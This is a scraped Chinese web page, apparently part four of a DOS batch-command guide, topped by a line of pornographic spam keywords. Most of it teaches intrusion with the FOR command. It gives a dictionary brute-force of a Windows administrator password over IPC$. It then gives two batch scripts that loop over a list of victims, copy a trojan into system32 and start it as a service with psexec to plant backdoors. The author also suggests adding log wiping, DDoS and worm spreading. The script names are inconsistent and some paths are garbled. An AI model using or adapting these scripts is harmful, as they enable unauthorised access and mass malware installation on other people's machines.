日本免费全黄少妇一区二区三区-高清无码一区二区三区四区-欧美中文字幕日韩在线观看-国产福利诱惑在线网站-国产中文字幕一区在线-亚洲欧美精品日韩一区-久久国产精品国产精品国产-国产精久久久久久一区二区三区-欧美亚洲国产精品久久久久

  1. 首頁 > 云知道 > >

dos基礎(chǔ):批處理命令大全( 四 )

云知道


在以上例子中,%I 和 PATH 可用其他有效數(shù)值代替 。%~ 語法
用一個(gè)有效的 FOR 變量名終止 。選取類似 %I 的大寫變量名
比較易讀,而且避免與不分大小寫的組合鍵混淆 。
以上是MS的官方幫助,下面我們舉幾個(gè)例子來具體說明一下For命令在入侵中的用途 。
sample2:
利用For命令來實(shí)現(xiàn)對一臺目標(biāo)Win2k主機(jī)的暴力密碼破解 。
我們用net use ipipc$ "password" /u:"administrator"來嘗試這和目標(biāo)主機(jī)進(jìn)行連接,當(dāng)成功時(shí)記下密碼 。
最主要的命令是一條:for /f i% in (dict.txt) do net use ipipc$ "i%" /u:"administrator"
用i%來表示admin的密碼,在dict.txt中這個(gè)取i%的值用net use 命令來連接 。然后將程序運(yùn)行結(jié)果傳遞給find命令--
for /f i%% in (dict.txt) do net use ipipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:ok.txt,這樣就ko了 。
sample3:
你有沒有過手里有大量肉雞等著你去種后門+木馬呢?,當(dāng)數(shù)量特別多的時(shí)候,原本很開心的一件事都會(huì)變得很郁悶:) 。文章開頭就談到使用批處理文件,可以簡化日常或重復(fù)性任務(wù) 。那么如何實(shí)現(xiàn)呢?呵呵,看下去你就會(huì)明白了 。
主要命令也只有一條:(在批處理文件中使用 FOR 命令時(shí),指定變量使用 %%variable)
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法請參見上面的sample1,在這里它表示按順序?qū)ictim.txt中的內(nèi)容傳遞給door.bat中的參數(shù)%i %j %k 。
而cultivate.bat無非就是用net use命令來建立IPC$連接,并copy木馬+后門到victim,然后用返回碼(If errorlever =)來篩選成功種植后門的主機(jī),并echo出來,或者echo到指定的文件 。
delims= 表示vivtim.txt中的內(nèi)容是一空格來分隔的 。我想看到這里你也一定明白這victim.txt里的內(nèi)容是什么樣的了 。應(yīng)該根據(jù)%%i %%j %%k表示的對象來排列,一般就是 ip password username 。
代碼雛形:
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------
@net use %1ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exedmin$system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@p***ec %1 c:winntsystem32windrv32.exe
@p***ec %1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------
這只是一個(gè)自動(dòng)種植后門批處理的雛形,兩個(gè)批處理和后門程序(Windrv32.exe),PSexec.exe需放在統(tǒng)一目錄下.批處理內(nèi)容
尚可擴(kuò)展,例如:加入清除日志 DDOS的功能,加入定時(shí)添加用戶的功能,更深入一點(diǎn)可以使之具備自動(dòng)傳播功能(蠕蟲).此處不多做敘述,有興趣的朋友可自行研究.

推薦閱讀